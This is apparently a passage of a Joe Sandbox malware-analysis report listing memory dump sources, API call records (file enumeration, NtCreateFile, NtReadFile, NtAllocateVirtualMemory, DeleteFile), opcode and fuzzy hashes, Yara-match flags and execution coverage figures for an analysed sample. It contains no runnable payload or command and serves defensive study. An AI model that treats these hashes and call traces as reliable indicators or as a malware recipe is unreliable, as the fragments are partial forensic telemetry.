                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-3526935505
                                                • Opcode ID: eac4616424afa45210fa528032ca8739f466dbbf289490f915a1e5d2ba74d66a
                                                • Instruction ID: 1c1492c3c99cf7be4eb8c29a4d57e520ee41f9d311b37a43799334af22ed25e1
                                                • Opcode Fuzzy Hash: eac4616424afa45210fa528032ca8739f466dbbf289490f915a1e5d2ba74d66a
                                                • Instruction Fuzzy Hash: 7E314935104B85DFEB2FFB6CD809B557BE4EF12B14F04805DE4428BA52C7B8A882CB56
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: 0a646566f239807f8de2bdcb2fd2715c3900b9ae199e3a5879e4cfb908752f30
                                                • Instruction ID: 287ccb152462333bc95c098463874adfc17a2485e679fe3341550c693288a821
                                                • Opcode Fuzzy Hash: 0a646566f239807f8de2bdcb2fd2715c3900b9ae199e3a5879e4cfb908752f30
                                                • Instruction Fuzzy Hash: 8F115E32904218EBCF1AEFA4F84869C7B71FF54764F208519F926672D0CB715A40CB40
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0617b135655d457f109412ca8d01fca6d3f0d049844447ab03ec9e164cb22c57
                                                • Instruction ID: c1b688e1ab7633a2117326e921e3ea20e8fb1fd6d1429f934780eafdecdf0ef1
                                                • Opcode Fuzzy Hash: 0617b135655d457f109412ca8d01fca6d3f0d049844447ab03ec9e164cb22c57
                                                • Instruction Fuzzy Hash: 29E10E71D00609DFCB29CFADD984AADBBF1BF88714F24452AE946A7361D770A842CF11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: d1b22ecebddd89d9f55636be94bc1e83983dd61fdbad645bbc7b4228cd8cbc6e
                                                • Instruction ID: 94db279a3c1a26f9124587c97a34c3d16372f9cb3a4d9dfe44b4044ce6149ec6
                                                • Opcode Fuzzy Hash: d1b22ecebddd89d9f55636be94bc1e83983dd61fdbad645bbc7b4228cd8cbc6e
                                                • Instruction Fuzzy Hash: DB714971E0021AAFDF09CFA4C984ADDBBB5BF48314F14402AE915FB254D734A946CB95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: d8d541f46624ddcc8a3ec63b6d831139c2641bfdce59f0fbf175ce254904003d
                                                • Instruction ID: 3f13d0a36aaefd65e3ffd5e2f5635d7ed3cd5e9f3d9eb2914bbc2bfacd1fa0d6
                                                • Opcode Fuzzy Hash: d8d541f46624ddcc8a3ec63b6d831139c2641bfdce59f0fbf175ce254904003d
                                                • Instruction Fuzzy Hash: C1512275E0421AAFDF09CF98D8496DCBFB5BF48314F14812AE925EB250D7389A42CF54
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                • Opcode ID: 87f00ec702adf4ce07f3ad37948722c2e5fee847a225ce75c4a8272453a9da45
                                                • Instruction ID: 40b3460f1412fcfbe0859865fd3261060f475b4beb1a83648fdfd2b20426102e
                                                • Opcode Fuzzy Hash: 87f00ec702adf4ce07f3ad37948722c2e5fee847a225ce75c4a8272453a9da45
                                                • Instruction Fuzzy Hash: 16315671E00219AFCF29DFA8E848A9DBBF0FB58724F20416AE522B7380DB355901CF54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: bb8edcc7ba960592e9e097a0ce17321d68ba11068a20d573f8fbdbb31a1d7f77
                                                • Instruction ID: c8721a933ebfade0a1a10d58c2c741a304bf0aee989c86ea5f92fbe57aad7b54
                                                • Opcode Fuzzy Hash: bb8edcc7ba960592e9e097a0ce17321d68ba11068a20d573f8fbdbb31a1d7f77
                                                • Instruction Fuzzy Hash: CD329C70D0426ADFDB69DF68C884BEDBBB5BF08304F0081E9D549A7281E7749A94CF91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                • Instruction ID: 18448e034cf2adb590f5c04ac2b0a9ec6978416bf7b19a4720412bea6a87b82b
                                                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                • Instruction Fuzzy Hash: 1F91EA71E002169FDF2CDF6DC880ABEBBA9EF44728F14455AE961E72C0D7368960C752
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Bl$l
                                                • API String ID: 3446177414-208461968
                                                • Opcode ID: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                • Instruction ID: b1fa001f40a4836feb827fe0c9561b4f7f275e2f30b9a33e85191523155cb5e2
                                                • Opcode Fuzzy Hash: 20e5cb45c76a051026cf97882651248ce0a4b56ac9eef583cb369706a18c303e
                                                • Instruction Fuzzy Hash: 57A1F470A003298BEF39DB98E890BEDB7B5BB84704F4540E9D90967649CB74AEC4CF51
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 01165E34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                • Instruction ID: a24f2c32d1231f0ea3efd295b11bf1194a26fedd06aa54f94d9490656e6b6fb7
                                                • Opcode Fuzzy Hash: b6c9f1115a600e36f254b24eace0d4005c978c0c0d5e769bab6e888de3b2df84
                                                • Instruction Fuzzy Hash: B6517871B1C202E6DB6DB61CD9053796F9DAB00790F10C968E0D6C6299EB3784B5874B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                • Opcode ID: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                • Instruction ID: 58b57e476f8c99679cb18f05f5ba7aa75b7dd15aa059e2006cc53edd52547216
                                                • Opcode Fuzzy Hash: 9fb632662ac63e1fedd7c6bdc5ff5d4dac3ee27c4e3c0c13b8782a3421f4614c
                                                • Instruction Fuzzy Hash: DA51AEB1E00208CFDF6ACFA9C4886ADFBF4FF54354F15802AD4299B651EB719981CB80
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 0114D959
                                                  • Part of subcall function 01124859: RtlDebugPrintTimes.NTDLL ref: 011248F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                • Opcode ID: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                • Instruction ID: 46b7f513879388b5c23f774fff998f194c8c7b17eaf4997bb01a722e9fec448e
                                                • Opcode Fuzzy Hash: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                • Instruction Fuzzy Hash: DE51F371E003469FEF2DDFE8E4887ADBBB2BF64B18F144059D5056B285DB70A945CB80
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                • Instruction ID: 62b650e1ecb5f85f0f1018edc3a7cd3503af8c20e34e6e9453abcf665463ece6
                                                • Opcode Fuzzy Hash: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                • Instruction Fuzzy Hash: B341BF75E0021AABDF1ADF99D884AEEBFB5FF48714F150019E920A7341C7709942CB90
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0$0
                                                • API String ID: 3446177414-203156872
                                                • Opcode ID: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                • Instruction ID: d32f5d0d6553264fe2e6a66849e14fcf1450f8b62f9e4ca70320c8880b6f9660
                                                • Opcode Fuzzy Hash: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                • Instruction Fuzzy Hash: E6417CB16087069FC715CF68D484A1ABBE4BF88718F04493EF988DB345D771EA06CB96

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:4.3%
                                                Signature Coverage:1.6%
                                                Total number of Nodes:445
                                                Total number of Limit Nodes:68
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02CEC154
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02CEC18F
                                                • FindClose.KERNELBASE(?), ref: 02CEC19A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 3acf259d6109fd6736eedfc37785589ff6e5c3605d2951ae41d862d85f944664
                                                • Instruction ID: 2ed47248c5c8d2697d12d7c36c89d33300c1791ff463e3e193db2824e5711f35
                                                • Opcode Fuzzy Hash: 3acf259d6109fd6736eedfc37785589ff6e5c3605d2951ae41d862d85f944664
                                                • Instruction Fuzzy Hash: 25316371900248BBDF61EFA4CC85FFF777DAB94748F144459BA09A7180DB70AB849BA0
                                                APIs
                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02CF8053
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 7d3918d96377d45380e5f96e3ccee75bb942a6a2a95961f6c7ba960d242533c7
                                                • Instruction ID: e3159937b33e4fe80ca2d8f5b840245da4d4bffff21c6e326393bedff8c06ac3
                                                • Opcode Fuzzy Hash: 7d3918d96377d45380e5f96e3ccee75bb942a6a2a95961f6c7ba960d242533c7
                                                • Instruction Fuzzy Hash: 9631C6B5A11609AFCB44DF99D881EDFB7F9AF8C314F108219FA19A3240D770A951CFA4
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02CF819E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 42ae1454f79cb2b1805eedd885f160374091396aa826fe47bbc75e170c91e90f
                                                • Instruction ID: 9a68e44cda0d799c577355f8449771374e0e15a659068b325ef33ad0683a81d1
                                                • Opcode Fuzzy Hash: 42ae1454f79cb2b1805eedd885f160374091396aa826fe47bbc75e170c91e90f
                                                • Instruction Fuzzy Hash: D431E6B5A00209ABCB54DF99DC80EEFB7B9AF8C314F108609F918A7240D770A9118FA4
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(02CE1BDE,?,02CF6FC7,00000000,00000004,00003000,?,?,?,?,?,02CF6FC7,02CE1BDE,?,02CF0A11,02CF6FC7), ref: 02CF8470
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 9cf9ea5c621c8626a6e8b2e8105620b837b0ca86e8c8e2689626e4cebbda9284
                                                • Instruction ID: 0255acd26044e196ee149a0d37e1e0f2da1bf070efca1891c30d2d1764d46e23
                                                • Opcode Fuzzy Hash: 9cf9ea5c621c8626a6e8b2e8105620b837b0ca86e8c8e2689626e4cebbda9284
                                                • Instruction Fuzzy Hash: B121FBB5A11208ABCB54DF59DC41FEBB7B9AF88314F108509FE18A7240D770A9118FA5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 7b011d83d8022cc843fb96c18d267e3105f121b7b855ae6b2747f5c3e8142fda
                                                • Instruction ID: 742c41ab8f8f21fdaf09f1300e67b9e0a1fcc331b239b464a7213eb054094285
                                                • Opcode Fuzzy Hash: 7b011d83d8022cc843fb96c18d267e3105f121b7b855ae6b2747f5c3e8142fda
                                                • Instruction Fuzzy Hash: EA016D72A51608BBD660EAA8DC41FEB77ADDB88714F104409FA18A7180D7B079148FE5
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02CF8284
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction ID: 90cfd72eb7373361d17cd3a8c911cce0bbf5c09d27e001849d66137cf575ee2c
                                                • Opcode Fuzzy Hash: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction Fuzzy Hash: CDE08C32200204BBC620EA69DC40FDBB7ADDFC5764F518419FA0CA7281C6B0BA01CBF0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eec91b5698135072a423cadd2704b6b044750fa8c651833e0538ad20b9bc50dd
                                                • Instruction ID: b52ab2dc8ba592e99cdd20d96364e768c3c7471fbcab1b59221fbe84f9d9a85e
                                                • Opcode Fuzzy Hash: eec91b5698135072a423cadd2704b6b044750fa8c651833e0538ad20b9bc50dd
                                                • Instruction Fuzzy Hash: CA900271B05C04129140B19C588454A4445A7E0311B59C011E4424555C8B148A566361
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
